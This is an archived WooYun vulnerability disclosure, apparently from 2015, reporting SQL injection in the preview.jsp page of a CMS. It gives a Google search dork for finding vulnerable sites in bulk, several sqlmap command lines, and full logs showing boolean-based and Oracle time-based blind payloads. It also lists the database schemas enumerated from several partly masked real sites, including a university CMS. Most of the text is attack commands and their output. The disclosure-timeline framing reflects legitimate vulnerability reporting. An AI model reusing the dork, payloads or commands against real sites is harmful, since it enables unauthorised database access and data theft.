乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
RT
谷歌批量化:inurl:webapp/preview.jsp?ColumnID=插图
C:\Users\dark3r>sqlmap.py -u "http://**.**.**.**/cms/webapp/preview.j?ColumnID=158&TID=20130816133549129164353" --batch --dbms=oracle _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150831}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu consent is illegal. It is the end user's responsibility to obey all applicabllocal, state and federal laws. Developers assume no liability and are not respsible for any misuse or damage caused by this program[*] starting at 10:51:31[10:51:31] [INFO] testing connection to the target URL[10:51:33] [INFO] heuristics detected web page charset 'ISO-8859-2'sqlmap resumed the following injection point(s) from stored session:---Parameter: ColumnID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ColumnID=158 AND 6637=6637&TID=20130816133549129164353---[10:51:34] [INFO] the back-end DBMS is Oracleweb application technology: Apache 2.2.22, JSPback-end DBMS: Oracle[10:51:35] [INFO] fetched data logged to text files under 'C:\Users\dark3r\.sqlmap\output\**.**.**.**'[*] shutting down at 10:51:35
2.
d:\Desktop>sqlmap.py -u "http://**.**.**.**/cms/webapp/preview.jsp?ColumnID=921&TID=20151124093417625381441" --batch --dbms=oracle _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150831}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 19:26:03[19:26:03] [INFO] testing connection to the target URL[19:26:04] [INFO] heuristics detected web page charset 'ISO-8859-2'sqlmap resumed the following injection point(s) from stored session:---Parameter: TID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ColumnID=921&TID=20151124093417625381441' AND 4096=4096 AND 'Sjmn'='Sjmn---[19:26:05] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[19:26:05] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
C:\Users\dark3r>sqlmap.py -u "http://**.**.**.**/cms/webapp/preview.jsp?ColumnID=1250000790&TID=20140228062128071747515" --batch --dbms=oracle --dbs _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150514}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 10:50:44[10:50:44] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ColumnID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ColumnID=1250000790 AND 8525=8525&TID=20140228062128071747515---[10:50:46] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oracle[10:50:46] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[10:50:46] [INFO] fetching database (schema) names[10:50:46] [INFO] fetching number of databases[10:50:46] [INFO] resumed: 4[10:50:46] [INFO] resumed: SYS[10:50:46] [INFO] resumed: SYSTEM[10:50:46] [INFO] resumed: ZS_CMS[10:50:46] [INFO] resumed: ZS_SCOREavailable databases [4]:[*] SYS[*] SYSTEM[*] ZS_CMS[*] ZS_SCORE[10:50:46] [INFO] fetched data logged to text files under 'C:\Users\dark3r\.sqlmap\output\**.**.**.**'
C:\Users\dark3r>sqlmap.py -u "http://**.**.**.**/bjutCms/cms/webapp/preview.jsp?ColumnID=9&TID=20150529110217599213810" --dbms=oracle --batch --dbs _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150514}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 10:50:52[10:50:52] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: TID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ColumnID=9&TID=20150529110217599213810' AND 5029=5029 AND 'ZqpK'='ZqpK Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ColumnID=9&TID=20150529110217599213810' AND 9044=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(78)||CHR(121)||CHR(108),5) AND 'Ouqv'='Ouqv---[10:50:52] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[10:50:52] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[10:50:52] [INFO] fetching database (schema) names[10:50:52] [INFO] fetching number of databases[10:50:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[10:50:52] [INFO] retrieved:[10:50:53] [WARNING] reflective value(s) found and filtering out18[10:50:55] [INFO] retrieved: BJUTCMS[10:51:14] [INFO] retrieved: BJUTCMSTEST[10:51:41] [INFO] retrieved: CTXSYS[10:51:57] [INFO] retrieved: DBSNMP[10:52:13] [INFO] retrieved: DMSYS[10:52:27] [INFO] retrieved: EXFSYS[10:52:43] [INFO] retrieved: LUNTAN[10:52:59] [INFO] retrieved: MDSYS[10:53:12] [INFO] retrieved: OLAPSYS[10:53:31] [INFO] retrieved: ORDSYS[10:53:47] [INFO] retrieved: OUTLN[10:54:00] [INFO] retrieved: SCOTT[10:54:14] [INFO] retrieved: SYS[10:54:23] [INFO] retrieved: SYSMAN[10:54:39] [INFO] retrieved: SYSTEM[10:54:55] [INFO] retrieved: TSMSYS[10:55:11] [INFO] retrieved: WMSYS[10:55:25] [INFO] retrieved: XDBavailable databases [18]:[*] BJUTCMS[*] BJUTCMSTEST[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] LUNTAN[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[10:55:34] [INFO] fetched data logged to text files under 'C:\Users\dark3r\.sqlmap\output\**.**.**.**'
过滤参数
危害等级:高
漏洞Rank:12
确认时间:2015-11-30 11:01
CNVD确认并复现所述情况,暂未建立与软件生产厂商的直接处置渠道,涉及案例已经转由CNCERT按照以往的联系渠道,向相关部门通报。
暂无